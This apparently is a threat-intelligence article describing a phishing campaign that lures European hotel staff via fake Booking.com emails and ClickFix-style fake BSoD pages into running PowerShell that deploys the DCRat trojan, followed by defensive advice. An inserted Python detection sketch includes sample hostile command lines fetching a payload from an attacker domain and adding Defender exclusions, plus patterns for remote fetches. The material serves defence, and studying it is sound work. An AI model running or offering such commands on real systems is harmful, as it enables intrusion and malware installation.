Cybersecurity researchers have uncovered a sophisticated phishing and malware campaign that is targeting hotel staff across the European hospitality sector by leveraging fake emails that appear to come from Booking.com and other legitimate online travel platforms. The goal of this multi‑stage attack is to deliver a remote access trojan (RAT) known as DCRat to compromised systems by redirecting unsuspecting victims to convincing fake pages — including phony Blue Screen of Death (BSoD) fixers — and tricking them into executing malicious commands.

The campaign, identified by cybersecurity firm Securonix as PHALT#BLYX, demonstrates how threat actors are increasingly combining social engineering, living‑off‑the‑land (LotL) techniques, and deception‑based lures to bypass security protections and establish long‑term access to targeted networks.

How the Attack Begins: Deceptive Emails That Look Real

The attack chain starts with a phishing email impersonating Booking.com — one of the world’s most widely used hotel booking services. These fake emails are crafted to look extremely convincing, containing familiar branding, reservation details, and messages that seem pressing and business‑critical. Among the typical subject lines and content are warnings about:

  • Unexpected booking cancellations
  • Reservation updates requiring action
  • Urgent verification of booking details

Recipients are urged to click a provided link to confirm or verify the booking status. Because the messages use real‑looking reservation details, dates, and subtle contextual cues, they can easily fool hotel administrative staff who deal with such emails daily.

By exploiting the trust inherent in familiar travel platforms, attackers reduce suspicion and increase the likelihood that targets will interact with the malicious links. This is a classic example of social engineering at scale — not relying on advanced zero‑day exploits, but rather on manipulating human behavior to trigger the breach.

ClickFix‑Style Redirection: The Deception Deepens

Once the recipient clicks on the link in the email, the campaign moves into its next phase: redirection to a fake Booking.com‑like website. The URLs used are often carefully chosen domains such as low‑house[.]com that mask their true intent while containing subtle clues to appear legitimate.

Instead of taking the victim to the actual Booking.com site, the link goes through a ClickFix‑style chain of redirects — a growing social‑engineering technique that has been observed in multiple phishing campaigns. The victim first sees a lookalike CAPTCHA screen, ostensibly designed to “verify that you’re human.”

Fake CAPTCHA pages are a key part of modern phishing tactics: they give victims a veneer of interaction that feels familiar while feeding them into the next bait — a bogus Blue Screen of Death (BSoD) or fix page that promises a solution to a non‑existent problem.

On this fake BSoD page, victims are instructed to follow specific “recovery instructions” — typically involving opening the Windows Run dialog and pasting a provided command. Executing this command sets in motion the second stage of the attack: the silent execution of malicious PowerShell commands.

Malicious Payload: DCRat Takes Hold

The core objective of the campaign is to deliver and execute DCRat (Dark Crystal RAT) on victim systems. DCRat is an off‑the‑shelf .NET‑based RAT with a plugin‑based extension architecture capable of:

  • Harvesting sensitive information
  • Logging keystrokes
  • Running arbitrary commands sent by the attacker
  • Deploying additional payloads such as cryptocurrency miners
  • Actively interacting with the compromised machine

To achieve this, the initial PowerShell command executed by the victim’s system performs several actions behind the scenes:

  1. It downloads an MSBuild project file (v.proj) from a remote server (2fa‑bns[.]com).
  2. It runs this project file using MSBuild.exe, which in turn executes an embedded payload.
  3. The code configures Microsoft Defender Antivirus exclusions to evade detection by endpoint protection platforms.
  4. It sets up persistence mechanisms — typically placing files in the Startup folder to ensure the malware runs after reboot.
  5. Finally, it launches the DCRat malware, which connects back to the attacker’s command‑and‑control (C2) server and awaits instructions.

If the malware does not execute with administrator rights, it doesn’t simply fail; instead, it enters a loop that repeatedly triggers Windows User Account Control (UAC) prompts in hopes that the victim will eventually grant elevated permissions out of frustration or misunderstanding.

This is a hallmark of living‑off‑the‑land (LotL) tactics, where attackers abuse legitimate binaries and tools — such as PowerShell and MSBuild.exe — to carry out malicious actions without raising the usual flags that traditional security tools watch for.
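As an added illustration (not part of the original report or of Securonix's analysis), the Python sketch below shows how the chain just described could be spotted in endpoint telemetry: each process or file event is checked against rules for the PowerShell remote fetch, MSBuild.exe launched from a script host with a .proj file, the Defender exclusion and the Startup‑folder write, and any host that trips more than one rule is reported. The hostnames, paths and command lines are constructed for the example; only the 2fa‑bns[.]com domain and the v.proj file name come from the write‑up.

```python
import re
from collections import defaultdict

# Constructed sample telemetry mimicking the PHALT#BLYX chain described above.
# Only the (defanged) domain and file name are from the write-up; hosts, paths
# and command lines are invented for illustration, not real campaign artefacts.
SAMPLE_EVENTS = [
    {"host": "frontdesk-01", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c iwr http://2fa-bns[.]com/v.proj -OutFile C:\\Users\\fd\\AppData\\Local\\Temp\\v.proj"},
    {"host": "frontdesk-01", "type": "process", "parent": "powershell.exe", "image": "MSBuild.exe",
     "cmdline": "MSBuild.exe C:\\Users\\fd\\AppData\\Local\\Temp\\v.proj"},
    {"host": "frontdesk-01", "type": "process", "parent": "MSBuild.exe", "image": "powershell.exe",
     "cmdline": "powershell Add-MpPreference -ExclusionPath C:\\Users\\fd\\AppData\\Roaming"},
    {"host": "frontdesk-01", "type": "file", "image": "powershell.exe",
     "path": "C:\\Users\\fd\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\upd.exe"},
    # Benign control: a developer building a project from Visual Studio must not fire.
    {"host": "dev-07", "type": "process", "parent": "devenv.exe", "image": "MSBuild.exe",
     "cmdline": "MSBuild.exe C:\\src\\pms\\pms.csproj /t:Build"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
REMOTE_FETCH = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|curl)\b.*https?://", re.I)

def match_rules(ev):
    """Return the names of the detection rules a single event satisfies."""
    hits = []
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "")
    if ev["type"] == "process":
        if image == "msbuild.exe" and ev["parent"].lower() in SCRIPT_HOSTS and ".proj" in cmd.lower():
            hits.append("msbuild_proj_from_script_host")      # LotL: MSBuild run from PowerShell/cmd
        if image in SCRIPT_HOSTS and REMOTE_FETCH.search(cmd):
            hits.append("script_host_remote_fetch")           # stage-1 download of the .proj
        if "add-mppreference" in cmd.lower() and "-exclusion" in cmd.lower():
            hits.append("defender_exclusion_added")           # Defender evasion step
    elif ev["type"] == "file" and STARTUP_DIR.search(ev["path"]) and image in SCRIPT_HOSTS:
        hits.append("startup_folder_persistence")             # persistence step
    return hits

def correlate(events, min_rules=2):
    """Group rule hits per host; a host tripping several distinct rules is a likely chain."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(match_rules(ev))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_rules}

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

Any single rule here will also fire on legitimate administration (a developer running MSBuild, an admin adding an exclusion), which is why the per‑host correlation, not the individual rule, is what should page an analyst.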

Distraction Tactic: Redirecting to Legitimate Sites

To make the interaction seem less suspicious, the attackers include a clever distraction: while the PowerShell script runs, it also opens the real Booking.com admin page in the victim’s default web browser. This gives the victim the impression that they are performing a legitimate action related to their work, obscuring the fact that their system has already been compromised.

This distraction is a psychological trick — it reassures victims that they landed on a legitimate site and that “everything looks normal now,” reducing the likelihood that they will suspect malicious activity even after the compromise has occurred.

Who Is Being Targeted? Focus on the Hospitality Industry

While many phishing campaigns indiscriminately target consumers and business users alike, this one is finely tuned to the hospitality sector, particularly hotel chains and property administrators that routinely handle Booking.com communications.

Researchers note that the phishing emails often contain room charge details denominated in Euros, suggesting a strong focus on European organizations — a region with a large tourism and hospitality industry where real‑world travel and booking demands are high.

Hotel staff and booking administrators are particularly valuable targets because they:

  • Frequently receive and process reservation emails.
  • Deal with high volumes of time‑sensitive messages.
  • Are more likely to click links that promise to confirm or correct booking details.
  • Have access to internal booking systems, customer data, and payment information.

These factors make them ideal candidates for attackers seeking both access and credibility. Once attackers have a foothold in hotel networks, they can often move laterally or leverage the compromised systems to impersonate staff and reach customers with further fraud.

Why This Campaign Is So Dangerous

This attack stands out for several reasons:

1. Multi‑Stage Social Engineering

The campaign doesn’t rely on a single malicious email; it uses multiple layers of social engineering — from fake booking notifications to CAPTCHA screens to BSoD fix prompts — to guide victims through the infection process step by step, lowering suspicion at each stage.

2. Abuse of Legitimate Tools

Instead of shipping a standalone malware binary that could be detected by antivirus tools, the attackers use PowerShell scripts and MSBuild.exe — trusted Windows components — to pull down the payload and execute it. This technique makes it harder for defensive tools to spot malicious activity.

3. Persistence and Defender Evasion

By setting up Defender exclusions and persistence in the Startup folder, the malware ensures that it survives reboots and superficial cleanup attempts and keeps running on the system.

4. Dual Purpose: Compromise and Monetization

DCRat doesn’t just give attackers initial access; it provides a platform for extended control. From stealing login credentials to capturing keystrokes and executing further payloads, the infected system becomes an asset in the attacker’s botnet or fraud infrastructure.

Broader Context: Hospitality Sector Already a Frequent Target

This attack is part of a broader trend in which cybercriminals and phishing gangs target hotel systems and online travel platforms to harvest credentials, payment data, and other sensitive information.

Previous campaigns have leveraged variations of similar tactics: fake CAPTCHA challenges, look‑alike URLs targeting booking confirmations, and malware deployment via compromised hotel admin email accounts.

One campaign reported in 2025 involved malvertising and credential‑stealing techniques tied to fake booking confirmations that redirect victims to fraudulent web pages.

Hospitality workers are consistently prime targets due to their exposure to frequent guest communications, time‑critical reservations, and the high trust placed in messages that appear to come from platforms like Booking.com.

The Risks Extend Beyond Staff to Guests

Once hotel systems are compromised, attackers can expand their campaign to target actual customers. Guest information stored in compromised systems — including email addresses, reservation details, and contact information — can be used in follow‑up phishing or scam messages designed to trick guests into revealing payment details or clicking further malicious links.

In some reported cases from earlier campaigns, attackers have sent fake emails or WhatsApp messages to guests with real reservation details to create credibility before redirecting them to phishing or malware pages.

This extends the risk from hotel systems to countless travelers and customers, making it a broader consumer threat.

How Organizations Can Defend Against This Threat

Given the highly targeted nature of the campaign, defensive measures must span technical controls, user awareness, and operational safeguards:

1. Staff Education and Awareness

Hotel staff — especially those who handle guest bookings and administrative emails — should receive regular training on cyber threats. They should be taught to:

  • Verify email sender addresses and URLs before clicking.
  • Hover over links to confirm their true destination.
  • Avoid executing commands received from unverified sources.
  • Treat unusual or high‑pressure requests with skepticism.

Training can significantly reduce the effectiveness of social engineering lures.

2. Multi‑Factor Authentication (MFA)

For platforms like Booking.com, Expedia, and internal hotel systems, enabling MFA can help prevent unauthorized access even if credentials are compromised.

3. Endpoint Detection and Response (EDR)

Hotels should deploy robust EDR solutions capable of detecting living‑off‑the‑land execution techniques, anomalous PowerShell behavior, and unusual persistence mechanisms. These tools can raise alerts when trusted binaries are used in suspicious ways.

4. Email Filtering and Anti‑Phishing Tools

Advanced email security solutions can block phishing emails before they reach staff inboxes by analyzing link reputations, domain spoofing attempts, and other threat signals.

5. Incident Response Plans

Hospitality organizations should have formal incident response plans that include steps for identifying, containing, and remediating malware infections, including isolating infected hosts and resetting potentially compromised credentials.

Conclusion: A Growing Threat to an Important Industry

The PHALT#BLYX campaign targeting hotel staff via fake booking emails is a stark reminder of how social engineering and modern malware delivery techniques can combine to bypass traditional security mechanisms.

By posing as familiar, trusted communications from well‑known travel platforms, attackers can lure hotel administrators into executing seemingly routine tasks that result in serious system compromise and long‑term access by threat actors.

For an industry that relies heavily on timely and accurate communications to serve millions of travelers worldwide, this kind of targeted attack — combining deceptive emails, ClickFix‑style lures, and advanced malware — represents a significant operational and reputational risk.

Staying ahead of these campaigns requires a combination of vigilance, awareness, technical defenses, and industry collaboration — because as attackers evolve their tactics, so too must the defenses guarding sensitive hospitality infrastructure and customer data.